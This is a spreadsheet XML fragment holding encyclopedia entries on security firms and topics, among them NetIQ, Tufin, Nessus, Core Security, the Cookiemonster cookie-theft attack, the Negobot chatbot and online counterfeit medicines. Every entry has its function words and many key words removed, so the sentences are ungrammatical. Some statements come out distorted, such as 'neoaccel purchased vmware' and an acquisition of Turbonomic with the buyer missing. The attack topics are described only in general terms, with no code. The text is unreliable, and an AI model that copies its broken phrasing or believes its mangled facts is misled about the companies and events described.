    <t>netiq product line within cyberres line business micro focus, includes solutions focused cybersecurity, including arcsight, fortify, voltage, netiq.netiq previously based houston, texas, products provide identity access management, security data center management. flagship offerings netiq identity manager netiq access manager. other past software titles include appmanager, secure configuration manager, sentinel. micro focus international owned netiq since 2014, acquired attachmate group, acquired netiq 2006, years latter acquired mission critical software. history netiq founded ching-fa hwang, her-daw che, wong, prayoon cheng kemp september 1995; appmanager introduced 1996. their february 2000 merger mission critical software widened company's focus include systems management well performance.in 2001, netiq acquired webtrends, whose software "monitors corporate internet traffic." sold 2005.in 2006, netiq acquired attachmatewrq, after company acquired novell 2011, changed name attachmate group. netiq added identity security products well data center virtualization offerings. attachmate acquisition alignment netiq products three categories: identity access management, security management data center management.in 2014, attachmate group merged micro focus international. products services netiq access manager access management product provides single sign-on applications. netiq identity manager netiq's implementation identity management software. utilizes xml-based configuration files determine product's implemented functions. privilege access management change guardian privileged account manager also companies portal references external links official website further reading weitzell, steve; matheson, richard; nuffer, perry; lowry, lee; scheuber, volker (2006). novell identity manager administrator's handbook. novell press. isbn 978-0-672-32864-0. kuo, peter (2002). novell's guide dirxml. wiley. isbn 978-0-7645-4919-9.</t>
  </si>
  <si>
    <t>NetCentrics</t>
  </si>
  <si>
    <t>netcentrics corporation, based herndon, virginia, contractor federal government, department homeland security federal civilian agencies. netcentrics provides enterprise cloud cybersecurity services government private industry. company headquarters located inside dulles technology corridor nova. workforce combination on-site off-site employees. many employees remote workers greater national capital region washington, d.c. most employees security clearances (secret, secret, etc.), depending role. history netcentrics founded 1995 dixon dougherty, company's first ceo. company name derived first "netcentric" government contractors time. early contract u.s. army pentagon resulted employee presence 9/11. employees harmed. later, three netcentrics employees recognized efforts restore digital communications immediately attack.in october 2021 company acquired cerberus capital management. leadership kenneth cushing became chief executive officer october 2021.in january 2020, lawrence o'connor named president, replacing previous ceo. named netcentrics july, 2021. contract vehicles netcentrics provides services federal government contract vehicle awards. contract vehicles competitively typically last several years. current contract vehicles include: disa encore information technology support service (itss) blank purchase agreement (bpa) (ftc itss bpa) schedule schedule (cybersecurity) seaport next generation (seaport nxg) partnerships, mentorships joint ventures netcentrics established mentor-protégé broadleaf, native hawaiian organization (nho)-owned small business, 2017. this 8(a) program gives broadleaf access netcentrics' expertise cybersecurity, network management; expands offerings federal customers. company established similar relationship osprey technology solutions, inc., woman-owned small business (wosb) minority business (mbe) certified company. osprey provides information technology hardware, software, engineering, installation, testing maintenance services government private clients. also provides various technological cybersecurity solutions, well intraoperative neurophysiological monitoring services wide variety surgical procedures. joint venture netcentrics osprey called netsprey serves healthcare sector. awards 2019 current 2021 netcentrics scored "best place work washington, d.c." employees, ranking region workplace culture leadership approval. company also "best leadership award", ranking nationally small medium-sized companies, also comparably. october company received "best work-life balance" award, ranking nationally small business category. 2020 netcentrics named most promising homeland security solutions provider, focus artificial intelligence cybersecurity technology. 2016 2019 netcentrics recognized comparably 2017 2018, receiving total awards including best companies best ceo, best company diversity, best company outlook. 2018, netcentrics recognized live fastest growing cybersecurity companies washington metropolitan area. references external links official website</t>
  </si>
  <si>
    <t>Net Applications</t>
  </si>
  <si>
    <t>applications analytics firm. company commonly known browser development technology news communities global market share statistics. history since 1999, applications source applications webmasters emarketers. headquartered aliso viejo, california, applications distributes services 7,000 partners affiliates. criticism while statistics released company routinely place operating systems sold microsoft (windows) apple (mac high market share desktop computer category (through 2013), vincent vizzaccaro (evp marketing strategic alliances, applications, 2002–present) stated microsoft apple among company's clients. company also admitted statistics skewed. also usage share browsers usage share operating systems browser market share browser wars references external links official website</t>
  </si>
  <si>
    <t>Tufin</t>
  </si>
  <si>
    <t>tufin security policy management company specializing automation security policy changes across hybrid platforms improving security compliance. tufin orchestration suite supports next-generation firewalls, network layer firewalls, routers, network switches, load balancers, proxies, private public cloud platforms microservices. history prior 2019 initial public offering, tufin privately funded since establishment.on april 2022 tufin announced entered definitive agreement acquired software-focused investment firm, turn/river capital. agreement valued company $570 million, would all-cash deal. upon closing deal, tufin private company. products tufin develops markets tufin orchestration suite consists securetrack: firewall operations management, auditing compliance securechange: security change automation secureapp: application connectivity management securecloud: hybrid cloud securitythe company releases updates tufin orchestration suite quarter. suite designed large enterprises well managed security service providers (mssp) security auditors. tufin products help security teams implement maintain security policy firewalls, routers network switches. they accelerate service delivery network change automation expedite process compliance audits security standards dss, nerc sarbanes oxley. tufin products also help companies manage automate daily configuration changes network security devices. innovation tufin's innovation includes several technologies automatic policy generator refines security rules based network traffic, methods automating security policy management concept managing network security policies application scope. tufin's core technology protected multiple patents. partnerships other network security vendors provide operations management, auditing change automation tufin products. tufin technology partners include check point, cisco, fortinet, juniper networks, mcafee, palo alto networks, stonesoft, networks, vmware, zscaler, amazon services (aws), microsoft azure, bmc, servicenow, puppet labs others. references external links application connectivity management "tufin's secureapp completes trifecta security policy management" alan shimel rethinking firewall management zdnet article foremski deploys tufin swiss stock exchange uses tufin manage firewalls applications 2013 survey c-level managers senior professionals official company site "network security policy management solutions have evolved" research paper gartner "tufin collaborates microsoft integrate public cloud support microsoft azure tufin orchestration suite™"</t>
  </si>
  <si>
    <t>Coral Consortium</t>
  </si>
  <si>
    <t>coral consortium founded 2004 hewlett-packard corporation, intertrust technologies, koninklijke philips electronics n.v., matsushita electric industrial co., ltd. (panasonic), samsung electronics co., ltd, sony corporation twentieth century film corp. coral consortium dissolved december 2012. last specification available april 2013. coral proposes architecture whereby devices using different technologies able join domain allows exchange protected content securely. device used family member wishing play music file stored another family-owned device coral obtain copy license) correct format, coral infrastructure managing necessary permissions translation rights device. theory greatly ease portability protected media files devices. membership coral distinguishes promoter contributor members. promoter members hewlett-packard corporation (founding member) ifpi intertrust technologies corporation (founding member) koninklijke philips electronics n.v. (founding member) electronics universal, inc. panasonic corporation (founding member) samsung electronics co., (founding member) sony corporation (founding member) twentieth century film corp. (founding member) contributor members british telecommunications cloakware inc. music gibson guitar corporation inca networks kenwood corporation motion picture association america motorola packetvideo recording industry association america (riaa) securemedia inc. sony starz entertainment, stmicroelectronics, n.v. thomson universal music group verimatrix, inc. verisign, inc. warner music group additional information much coral documentation requires reader agree legal conditions, easy members public examine proposals. however, fairly full document available (coral consortium document). possible limitations while coral novel approach interoperability, doubts raised quarters whether really suitable media types. approach obtaining second file protected second system assumes file available, also assumes vendors (and service providers) cooperate coral. time writing, apple coral member company. coral membership leans heavily music companies; content types (e.g. video, games) strongly represented. bandwidth requirements (and download delay) obtaining second copy large file broadcast considerable. some europeans expressed concerns consumer privacy anonymity, content moves involve "phone home" coral service cloud. references external links coral consortium official website</t>
  </si>
  <si>
    <t>Turbonomic</t>
  </si>
  <si>
    <t>turbonomic enterprise software company headquartered boston, company's product simulates supply demand forces order efficiently allocate resources computing, database, memory storage. updated 2017 cloud computing platforms.turbonomic holds patents (with pending) related supply demand abstraction. 2011, gartner named turbonomic cool vendor cloud management. 2016, turbonomic listed product virtualization management report central station. turbonomic made five appearances inc. 5000, made forbes cloud four times. 2020, fast company named turbonomic best workplaces innovators list. company also deemed vendor watch aiops enterprise management associates (ema) combination abstraction, analytics, automation engine continually assures performance customer’s applications.to scale turbonomic's application resource management product, company formed alliance partnerships companies including cisco ibm, entering agreements bring application resource management larger customer base. since founding 2009, turbonomic raised $250m venture capital firms including bain capital ventures highland capital partners.in january 2017, turbonomic announced closed million financing round former chief information officer gary reiner.the company originally named vmturbo changed name turbonomic august 2017. turbonomic acquired parkmycloud sevone 2019. march 2021, company 3,000 customers, fortune 500. april 2021, announced acquire turbonomic. acquisition completed june 2021. references further reading borchers, callum (september 2013). "vmturbo names bain capital ventures partner benjamin ceo". boston globe. retrieved 2014-03-04. borchers, callum (january 2014). "utest leads massachusetts businesses forbes list promising companies". boston globe. retrieved 2014-03-07. morgan, timothy prickett (february 2013). "vmturbo 'invisible hand' control freak grabs virty servers". register. retrieved 2016-08-07. peter cohan january 2014). "growing 100% vmturbo takes share talent from ibm". forbes. retrieved 2016-08-03. burke, steve february 2014). "2014 data center 100: virtualization providers". crn. retrieved 2014-03-07. staff (august 2013). "emerging vendors 2013: virtualization vendors". crn. retrieved 2016-08-07. external links "vmturbo: number 2015 inc. 5000". inc.com. retrieved 2016-08-02. boslet, mark (2013-05-01). "vmturbo raises series deal globespan hub". network. retrieved 2016-08-02. "products year 2011: virtualization management". techtarget searchservervirtualization. retrieved 2014-03-03. "the intelligent edge. cloud management service-centric paradigm enterprise management" (pdf). hermes advisors. 2013. retrieved 2016-08-08. o'brien, ellen; wilson, sarah (february 2014). "vmturbo inc. vmturbo operations manager storage extension". techtarget searchvirtualstorage. retrieved 2014-03-07.</t>
  </si>
  <si>
    <t>Nessus (software)</t>
  </si>
  <si>
    <t>nessus proprietary vulnerability scanner developed tenable, inc. (nasdaq: tenb) operation examples vulnerabilities exposures nessus scan include: vulnerabilities could allow unauthorized control access sensitive data system. misconfiguration (e.g. open mail relay, missing patches, etc.). default passwords, common passwords, blank/absent passwords system accounts. nessus also call hydra external tool) launch dictionary attack. denial-of-service vulnerabilitiesnessus scans cover wide range technologies including operating systems, network devices, hypervisors, databases, servers, critical infrastructure. results scan reported various formats, plain text, xml, html latex. results also saved knowledge base debugging. unix, scanning automated command-line client. there exist many different commercial, free open source tools unix windows manage individual distributed nessus scanners. nessus provides additional functionality beyond testing known network vulnerabilities. instance, windows credentials examine patch levels computers running windows operating system. nessus also support configuration compliance audits, scada audits, compliance. history nessus project started renaud deraison 1998 provide internet community free remote security scanner. october 2005, tenable network security, company renaud deraison co-founded, changed nessus proprietary (closed source) license.the nessus engine minority plugins still gpl, leading forked open source projects based nessus like openvas greenbone sustainable resilience.today, product still exists formats; limited, free version full-feature paid subscription option. nessus available linux, windows, macos. tenable, inc. went public july 2018, twenty years nessus’ creation. also penetration test metasploit project openvas security administrator tool analyzing networks (satan) saint (software) snort (software) wireshark references external links official website nessus 2.2.11 files source code nessus source code 2.2.9</t>
  </si>
  <si>
    <t>NeoAccel</t>
  </si>
  <si>
    <t>neoaccel multinational company sells computer network security products direct end-user relationships. company best known vpn-plus product related icaa tssl technology. company headquartered jose, california, development support offices navi mumbai pune, india. company profile neoaccel founded 2004 former netscaler (purchased citrix) founder, michel susai. netscaler developed technology currently accelerates world's internet traffic companies like google, yahoo, aol. netscaler purchased citrix 2005 $300 million. neoaccel financial support venture capital infusions hotmail founder sabeer bhatia, inventor prabhu goel. 2006 neoaccel raised $4,000,000 baring private equity partners leasing.the company headquartered jose, california development office navi mumbai, india, support center pune, india, sales center beijing. 2011 neoaccel purchased vmware. research company holds main patents secure communications based networks. products neoaccel's flagship product vpn-plus. company claims fastest available icaa tssl technologies. product uses transport often categorized vpn, although company markets generation vpn. sgx-800 sgx-1200 sgx-2400 sgx-4800 virtualized global management system isps/msps vpn-plus evaluation edition vmware player vpn-plus vmware servernac-plus companies network access control device released 2007 awards/recognition herring asia 2006 winner gartner 2007 magic quadrant shaping info security 2006 notes</t>
  </si>
  <si>
    <t>Remote guarding</t>
  </si>
  <si>
    <t>remote guarding proactive security system combining cctv video cameras, video analytics, alarms, monitoring centers security agents. potential threats first spotted cameras analyzed real-time software algorithms based predefined criteria. once event identified software, security officer located remote center alerted analyze threat take appropriate action immediately prevent minimize damage occurring. these actions include verbal warning perpetrator two-way radio center reporting event local enforcement.remote guarding adds layer human verification automated security systems results reducing false alarms almost trained agents review alert taking action. this service along changes alarm industry handles alarms, second call verification, continue reduce false alarm burden local enforcement. compliance bureaus enforcement agencies remote guarding considered next innovation traditional man-guarding, licensed security officers placed site observe report suspicious activities department consumer affairs (dca), bureau security investigative services (bsis), jurisdiction private security industry. authority derived division commencing section 7580 thru section 7588.5, chapter 11.5, private security services business professions code (b&amp;p).because remote guarding relatively security industry, organizations agencies still working bringing standards remote guarding services respect previous traditional security mediums. october 2016, underwriter laboratories (ul) issued first certificate compliance remote guarding command control accordance requirements outlined 827b elite interactive solutions, llc. angeles, california. adaptation remote guarding traditional security guard companies, well breed security companies focus specifically remote guarding, emerged help secure facilities include property types automotive dealerships, multi-family residential housing, office buildings, office parks, warehouses, distribution centers, many locations security monitor protect property people.however, breed security companies exclusively focused remote guarding approached traditional security industry differently forgoing inclusion man-guarding designing systems hiring/training agents specifically solely provide remote guarding services. while direct competition remote guarding robert perry associates reports trend contract security companies starting electronic security divisions teaming companies specialize electronic security. according report, customers replacing security officers electronic security, enhancing security coverage using security officers electronic security devices. references</t>
  </si>
  <si>
    <t>Neil Schwartzman</t>
  </si>
  <si>
    <t>neil schwartzman canadian anti-spam activist involved anti-spam efforts since 1995. co-founder executive director cauce, canadian federal task force spam u.s. federal communications commission's csric network abuse protection working group. currently chair m3aawg awards committee.neil graduated vanier college montreal well concordia university. references</t>
  </si>
  <si>
    <t>Corporate Emergency Access System</t>
  </si>
  <si>
    <t>corporate emergency access system (ceas) credentialing program united states company's critical employees. event disaster serious emergency, employees show ceas cards first responders admitted business location. ceas helps businesses mitigate damage loss resulting allowing rapid access restricted areas. ceas helps businesses mitigate damage loss allowing critical employees rapid access restricted areas. this allows rapidly recover essential operations retrieve assets securities valuables; vital records, computer hardware critical equipment; core systems. they also conduct damage assessments. ceas developed york state 1990s business network emergency resources, not-for-profit organization pioneered emergency-identification-card-based capability. ceas access system adopted boston cambridge massachusetts, chester county philadelphia pennsylvania, erie, nassau, suffolk counties york, york city, baltimore stamford, connecticut. order businesses enroll ceas, local municipalities must adopt ceas program receive cards. local authorities implement ceas following emergency immediate threats life stabilized. participating businesses select pre-determined number employees receive ceas access cards based total employee population. references external links http://www.ceas.com</t>
  </si>
  <si>
    <t>Corporate warfare</t>
  </si>
  <si>
    <t>corporate warfare form information warfare attacks companies companies take place. such warfare part economic warfare cyberwarfare; involve espionage, 'dirty' tactics, physical theft. intention largely destabilise sink value opposing company financial gain, steal trade secrets them. fiction science fiction genre cyberpunk corporations guard data hire individuals break computer systems competitors. genre pioneered william gibson, power largely hands megacorporations often maintain private armies security forces wage corporate warfare other. cyber according schwartau corporate information warfare companies targeted, typically competitors. such warfare include methods industrial espionage, spreading disinformation, leaking confidential information damaging company's information systems.chris rouland cybersecurity cyberarms company endgame, inc. controversially advocated private companies allowed "hack back" nations criminals trying steal data. after wave high-profile attacks companies government databases panel experts assembled george washington university center cyber homeland security said policies eased allow "active defense" measures deter hackers recommend hacking back "because [they] want cure worse disease". relevantly february 2017 conference microsoft president brad smith stated technology companies need preserve trust stability online pledging neutrality cyber conflict.the dramatic increase internet business purposes exposed private entities greater risks cyber-attacks. garcia horowitz propose game theoretic approach considers economic motivations investment internet security investigate scenario firms plan long-term security investment considering likelihood cyber-attacks.botnets used knock business competitors line. they hired corporations disrupt operation competitors networks.low-grade corporate warfare constantly waged technology giants "patent trolls, insider blogs corporate talking points".supply chain attacks corporate warfare called supply chain interdiction.the term also refer privatization warfare mainly involvement private military companies.it speculated concept "non-international armed conflict within meaning article fourth geneva convention would wide enough allow covering renaissance corporate warfare". 2016 digital illustration series german foreal design studio called "corporate warfare" visualized power impact brand corporations branded torpedoes atomic bombs. dirk schuster, cofounder foreal states "big corporations power governments, military context".sam esmail, creator television series robot, states "the next world fought nukes, information, economics corporate warfare. also references</t>
  </si>
  <si>
    <t>Negobot</t>
  </si>
  <si>
    <t>negobot also referred lolita lolita chatbot chatterbot introduced public 2013, designed researchers university deusto optenet catch online pedophiles. conversational agent utilizes natural language processing (nlp), information retrieval (ir) automatic learning. because poses young female order entice track potential predators, became known media "virtual lolita", reference vladimir nabokov's novel. background 2013, university deusto researchers published paper work negobot disclosed text online. abstract, researchers addressed issue increasing number children using internet young users susceptible existing internet risks. their main objective create chatterbot ability trap online predators posed threat children. they intended deploy sites frequented predators social networks chatrooms. university researchers used information provided anti-pedophilia activist organization perverted-justice, including examples online encounters conversations sexual predators, supplement program's artificial intelligence system. features programmed persona chatterbot takes guise naive vulnerable 14-year-old girl. bot's programmers used methods artificial intelligence natural language processing create conversational agent fluent typical teenage slang, misspellings, knowledge culture. through linguistic features, able mimic conversational style young teenagers. also features split personalities seven different patterns conversation. negobot's primary creator, carlos laorden, expressed significance bot's distinguishable style communication, stating normally, "chatbots tend predictable. their behavior interest conversation flat, problem attempting detect untrustworthy targets like paedophiles." what makes negobot different game theory feature, makes able "maintain much realistic conversation." apart able imitate stereotypical teenager, program also able translate messages different languages. game theory negobot's designers programmed ability treat conversations potential predators game, objective collect much information suspect possible could provide evidence pedophilic characteristics motives. game theory shapes decisions makes overall direction conversation.the initiates undercover operations entering chat passive participant, waiting chatted user. once user elicits conversation, frame conversation keeps target engaged, extracting personal information discouraging leaving chat. information recorded potentially sent police. target seems lose interest, attempts make feel guilty expressing sentiments loneliness emotional need strategic, formulated responses, ultimately prolonging interaction. addition, provide fake information attempt lure target physical meetings. limitations despite able carry realistic conversation, negobot still unable detect linguistic subtleties messages others, including sarcasm. controversy john carr, specialist online child safety, expressed concern legality undercover investigation. claimed using unsuspecting internet users could considered form entrapment harassment. type information negobot collects potential online predators, said, unlikely upheld court. furthermore, warned relying software without real-world policing risks enticing individuals things would real-world policing factor. also sweetie (internet avatar) child exploitation online protection centre internet safety creep catcher references</t>
  </si>
  <si>
    <t>Negative database</t>
  </si>
  <si>
    <t>database security, negative database database saves attributes cannot associated certain entry.a negative database kind database contains huge amount data consisting simulating data. when anyone tries access databases actual negative data sets retrieved even steal entire database. example, instead storing personal details store personal details members have.negative databases avoid inappropriate queries inferences. they also support allowable operations. under scenario, desirable database support allowable queries protecting privacy individual records, inspection insider. collection negative data referred "negative sousveillance": "negative databases (esponda, 2006), keeping records stolen reveal identity individuals. negative databases achieve storing complement tracked. essentially database shows isn’t concern. extending approach negative intelligence gatherer would seek understand websites, infrastructure systems, environmental sensors documents become unavailable. negative sousveillance concept record, track, infer isn’t there." references</t>
  </si>
  <si>
    <t>Core Security Technologies</t>
  </si>
  <si>
    <t>core security helpsystems american computer network security company provides cyber threat prevention identity access management software products services, including penetration testing, network traffic analysis, threat detection, privileged access management, identity governance company’s research arm, corelabs, identifies security vulnerabilities, publishes public vulnerability advisories, works vendors assist eliminating exposures find.in february 2019, helpsystems acquired core security products secureauth. helpsystems global enterprise software company working areas automation cybersecurity. history 1996, core security founded buenos aires, argentina. year later, corelabs research group established published first advisory. core conducted first penetration test u.s. company 1998. year, core security recognized "endeavor entrepreneur" endeavor foundation, foundation supports entrepreneurial projects emerging markets. 2000, company's first u.s. office opened york, years later, core released first second versions flagship penetration testing product, core impact pro.in 2002, morgan stanley became shareholder core, investing million retaining seat board. 2003, company's u.s. headquarters relocated york boston, five years later, mark hatton became core security.in 2009, core adds development sites boston india. year later, core announced beta security testing measurement product, core insight. 2012, core announces partnership ncircle. year, core announces partnership objectives.in 2013, core security named 2013 inc. 500/5000 list. firm, time, employed people, based buenos aires.in 2014, core security adds intrinium partner program extends reach pacific northwest. year, core security announced latest version core attack intelligence platform. also 2014, core security information security magazine searchsecurity.com 2014 readers' choice awards "excellence vulnerability management."in december 2015, core security acquired identity access management (iam) company courion; 2016, courion rebranded core security name.in july 2016, core security technologies acquired damballa million.in 2017, core security merged secureauth.in 2019, helpsystems acquired core security solutions secureauth.on march 2020, core security helpsystems acquired cobalt strike. research advisories according website, core security's research department, core labs, conducts research system vulnerabilities, cyber attack planning simulation, source code auditing cryptography. core labs publishes security advisories, technical papers, project information shared software tools public use, researchers participating security research conferences including black briefings. also security testing vulnerability management references external links official website</t>
  </si>
  <si>
    <t>Counterfeit medicines online</t>
  </si>
  <si>
    <t>online distribution counterfeit medicines growing last decades. role internet unregulated medicine market main reasons behind phenomenon, especially effectiveness "spam" tool advertising promoting products. websites social media powerful instruments organized criminal groups could exploit conduct illicit businesses. spread emerging threat worldwide poses high risk health safety unaware consumers. definition 2017, world health assembly hosted world health organization agreed "substandard falsified (sf) medical products" term used future documentation subject substandard, spurious, falsified, falsely-labelled counterfeit (ssffc) medical products. under definition, counterfeit medicine falsified pharmaceutical product. term "counterfeit" avoided connected intellectual property rights rather public health. meaning associated "counterfeit medicines" incorporates various cases ascribable intentional replication product, product parts, without permission. role internet internet radically changed approach towards commerce, drastically modifying also buyers' attitudes towards purchase goods general. research demonstrated using computer fill prescription online using online chat groups learn health topics strong independent predictors prescription drug importation foreign countries united states consumers. cheap prices often primary reason behind consumers' purchase decisions; nonetheless, specific case medicines level anonymity granted internet another driving motive pushing consumers prefer online consumers (i.e. people diseases considered taboos, sexual psychological illnesses); practical convenience another good reason: pharmaceuticals delivered directly consumers' place; consumers also find online wider range products, always authorized countries (illegal medicines).if side internet created opportunities consumers, also represents powerful instrument organized criminals could exploit conduct illicit businesses. with internet criminals found emerging marketplace could possibly exploited many different ways take advantage almost unlimited possibilities offered cyberspace. recent years counterfeiters exploiting internet important channel offer counterfeit medicines wholesale retail level, often creating independent distribution process directly targets distributors final users. wholesale, counterfeiter exploit distributors' constant search costs products maximize profit. concerns retail level, counterfeiters deceive consumers prices sending constant stream spam messages e-mail inboxes. clear development communication technologies possibility exploiting massive internet market, unwillingly favored illegal activities. e-pharmacies browsing internet, easy online pharmacies operate according regulations transparency. them, criminals harsh unscrupulous competitors advertise fake drugs risk reputation online pharmacies operate honestly. however, internet nowadays plays significant role worldwide diffusion counterfeit pharmaceutical products. support business legal online pharmacies, institutions (for instance u.s.) developed accreditation system online pharmacies connected territorial ones operating internet. main limits concerning systems are: official seals institutions, posted pharmacies website warrantee, roughly imitated; institutions operate national level and, different domestic laws countries, difficult provide customers reliable information concerning quality pharmaceuticals available online. overview various typologies illicit e-pharmacies presented, basically focused rogue fake e-pharmacies. rogue e-pharmacies adhere accepted standards medicine and/or pharmacy practice, including standards safety, thus violating regulations, engage fraudulent deceptive business practices. they sell counterfeit pharmaceuticals designed websites pretend authenticity often contain features imitate legitimate ones. impact illicit e-pharmacies underestimated: sewage epidemiology showed &gt;60% consumed sildenafil netherlands obtained illegal sources. consumers still seem unable grasp risks associated particular issue. this happens also issue online sales counterfeit medicines seem receive attention media. side, fake e-pharmacies cyber criminals really sell medicines, baits defraud online buyers, case theft credit card cloning. scheme implies spider-web composed numerous websites aiming attract victims. goal infect computers latter virus steal valuable data. both types deceptive e-pharmacies rogue fake ones often efficiently promoted spam messages, work even better times health crisis, people frenzy certain types medicines surge cyber criminals seeking cash pandemic. deceiving strategies tools used criminals exploitation internet criminals caused spread uncontrolled unverified pieces information products. internet search engines, instance, unwillingly contribute keep illegal e-pharmacies business. struggle rogue fake online pharmacies requires combined efforts different levels. besides already mentioned "attractive factors". lower prices anonymity, counterfeiters also variety deceiving methods based fact potential buyers never possibility verify authenticity presented fake website. elements logos genuine online pharmacies, approval seal controlling authorities. moreover, reassure potential consumers often requested medical prescription, requisite purchase online medicines. thanks strategies, phenomenon counterfeit medicines sold online increasing. according eaasm (european alliance access safe medicines) times medicines bought online turned fakes. international cooperation with launch operation pangea 2008, first time illegal online pharmacies targeted international level. particular, operation targeted three main components used illegal websites: (internet service provider), payment systems delivery service. along years operation gained notable momentum number participating countries rose 2011. four operations pangea carried 2008 2011 always increasing number arrests seizures around world. 2011 pangea largest operation kind, involving agencies leading seizure million illicit counterfeit pills originating countries; shutting 13,500 websites inspection 45,000 packages. almost unlimited possibilities offered cyberspace, purchasing pharmaceuticals internet easy while, contrary, tracing various phases within distribution chain difficult. reason cooperation among different enforcement agencies different countries becomes essential. role spam another interesting element analyzed role spamming, present criminals able increase possibility success deceiving actions reaching greater number potential victims advertise products. term spam used describe abuse electronic messaging systems order indiscriminately send unsolicited bulk messages. term unsolicited refers fact message sent without verifiable permission granted recipient. message considered bulk sent part larger collection messages, identical content. spam problem consent, rather content. this significant element take consideration, attempts regulate contents e-mail messages risk contribute undermining freedom speech instead efficiently fighting phenomenon spamming. e-mails received organizations spam. spam volumes around world reach billion messages day, almost spam e-mail messages woman, child world. cheap anonymous promote products internet since also allows reaching large number people world, spamming represents powerful advertising instrument. therefore favorite ways used organized crime advertise illegal activities illicit products. online trade counterfeit pharmaceuticals escape rule medicines means among spammed online products. particular, cases particular easy spammers take advantage consumers' weaknesses. some steps taken organized criminals make operation effective presented. once spammers decided product want illicit advertise i.e. medicine series medicines next step reach agreement website dealing type medicines. lists e-mail addresses used spam recipients commonly sold crackers spammers. such lists contain million e-mail addresses, verified known working. avoid anti-spam filters, based list "dirty words", junk e-mails dealing medicines could simply contain image. since filters also designed protect certain types images, spammers learnt create pictures come jpeg files similar thus able elude filters again. last step, spammer requires software designed send bulk e-mails (i.e. dark mailer)in past years several companies settled series actions spammers. various "joint actions" place important sign determination private sector stop misuse internet illegal purposes, nevertheless thousand smaller companies dealing spamming daily basis unable dispose amount technological, financial human resources engaged fight. involvement organized crime interest organized crime towards illicit trafficking counterfeit medicines clearly demonstrated figures. instance, pill ecstasy costs €0.20 €0.30 generally sold viagra pill costs around €0.15 sold illicit website around €10. kilo counterfeit viagra pills (1,700 units) costs €255 retail value 13,600 €17,000. organized crime much involved activity many rogue fake e-pharmacies internet, also spamming activity. spamming usually part wider criminal scheme: spam powerful advertising tool therefore organized criminals order expand market. regard organized crime could rather seen veritable illicit enterprise spammers hold role sort advertising department. criminal operations internet clearly facilitated fact indeed easy register domain name website country, create back office another install online shop third country, especially considers many criminal groups operating transnational level already established alliances operate several countries. once online shop operational, could well easily direct payments fourth country eventually invest profits haven. moreover, often, order confuse investigators, money transferred chain bank accounts, creating smoke-screen makes investigations difficult. also authentication security label references external links european directorate quality medicines, official website european federation pharmaceutical industries associations, official website interpol, official website italian pharmaceutical agency, official website medicines healthcare products regulatory agency, official website united nations interregional crime justice research institute, official website world health organization, official website</t>
  </si>
  <si>
    <t>Cookiemonster attack</t>
  </si>
  <si>
    <t>cookiemonster attack man-in-the-middle exploit third party gain https cookie data "encrypted sessions only" property properly set. this could allow access sites sensitive personal financial information.it python based tool, developed security researcher mike perry. perry originally announced vulnerability exploited cookiemonster bugtraq 2007. year later, demonstrated cookiemonster proof concept tool defcon 16.users world wide reduce exposure cookiemonster attacks avoiding websites unprotected attacks. certain browsers make possible user establish sites are. example, users firefox browser privacy preferences window, click 'show cookies.' given site, inspecting individual cookies level name site, subdomain names, reveal 'send for: encrypted connections only,' set. has, user test site's vulnerability cookiemonster attacks deleting cookies visiting site again. site still allows user site vulnerable cookiemonster attacks. affected websites websites allegedly affected cookiemonster included: google services including: gmail, blogger, google docs, google finance search history airline/travel websites: southwest, united, expedia, usairways.com, priceline.com banks: national city, usaa, patelco, capitalone domain registrars: register.com, namesecure.com merchants: ebay, wireless.att.com, netflix, newegg also http cookie cookie theft session hijacking session hijacking references external links perry's defcon presentation (youtube) https://fscked.org/proj/cookiemonster/activehttpscookiestealing.pdf defcon presentation slides http://fscked.org/blog/cookiemonster-core-logic-configuration-and-readmes</t>
  </si>
  <si>
    <t>Conversion funnel</t>
  </si>
  <si>
    <t>e-commerce, conversion funnel journey consumer takes internet advertising search system, navigating e-commerce website, finally making purchase. consumer seen "converted" visitor site buyer. funnel describes progressive reduction number users stage process. advertising efforts aimed "upper funnel", "middle funnel", "lower funnel" potential customers.typically large number customers search product/service register page view referring page linked e-commerce site banner network conventional link. only small proportion seeing advertisement link actually click link. metric used describe ratio click-through rate (ctr) represents level funnel. typical banner advertising click-through rates 0.02% late 2010 decreased past three years. click-through rates highly sensitive small changes link text, link size, link position many others effects interact cumulatively. process understanding creative material brings highest click-through rate known optimization. once link clicked visitor referring page enters e-commerce site itself, small proportion visitors typically proceed product pages, creating constriction metaphorical funnel. each step visitor takes reduces number visitors, typically 30%–80% page. adding product shopping cart, registering filling contact details payment reduce numbers step-by-step cumulatively along funnel. steps, fewer visitors becoming paying customers. reason, sites similar pricing products hugely different conversion rates visitors customers therefore greatly differing profits. also purchase funnel references</t>
  </si>
  <si>
    <t>Confidential incident reporting</t>
  </si>
  <si>
    <t>confidential incident reporting system mechanism allows problems safety-critical fields aviation medicine reported confidence. this allows events reported otherwise might reported fear blame reprisals reporter. analysis reported incidents provide insight events occurred, spur development measures make system safer. examples aviation safety reporting system, created aviation industry 1976, earliest confidential reporting systems. international confidential aviation safety systems group umbrella organization confidential reporting systems airline industry.other examples include: ciras, (confidential incident reporting analysis system), confidential reporting system british railway industry chirp, (confidential human factors incident reporting programme confidential hazardous incident reporting programme) confidential reporting system british aviation maritime industries cross (confidential reporting structural safety), confidential reporting system structural civil engineering industryit suggested medical organizations also adopt confidential reporting model. examples confidential reporting medicine include coress, confidential reporting system surgery united kingdom. references also mandatory reporting near miss (safety) root cause analysis safety engineering</t>
  </si>
  <si>
    <t>Confidentiality</t>
  </si>
  <si>
    <t>confidentiality involves rules promise usually executed confidentiality agreements limits access places restrictions certain types information. legal confidentiality lawyers often required keep confidential anything pertaining representation client. duty confidentiality much broader attorney–client evidentiary privilege, covers communications attorney client.both privilege duty serve purpose encouraging clients speak frankly cases. this way, lawyers carry duty provide clients zealous representation. otherwise, opposing side able surprise lawyer court something know client, weaken client's position. also, distrustful client might hide relevant fact thinks incriminating, skilled lawyer could turn client's advantage (for example, raising affirmative defenses like self-defense) however, jurisdictions exceptions situations lawyer reason believe client kill seriously injure someone, cause substantial injury financial interest property another, using seeking use) lawyer's services perpetrate crime fraud. situations lawyer discretion, obligation, disclose information designed prevent planned action. most states version discretionary disclosure rule rules professional conduct, rule equivalent). jurisdictions made traditionally discretionary duty mandatory. example, jersey virginia rules professional conduct, rule 1.6. jurisdictions lawyer must convince client conform conduct boundaries disclosing otherwise confidential information. note exceptions generally cover crimes already occurred, even extreme cases murderers confessed location missing bodies lawyers police still looking bodies. u.s. supreme court many state supreme courts affirmed right lawyer withhold information situations. otherwise, would impossible criminal defendant obtain zealous defense. california famous strongest duties confidentiality world; lawyers must protect client confidences "every peril herself]" former california business professions code section 6068(e). until amendment 2004 (which turned subsection subsection (e)(1) added subsection (e)(2) 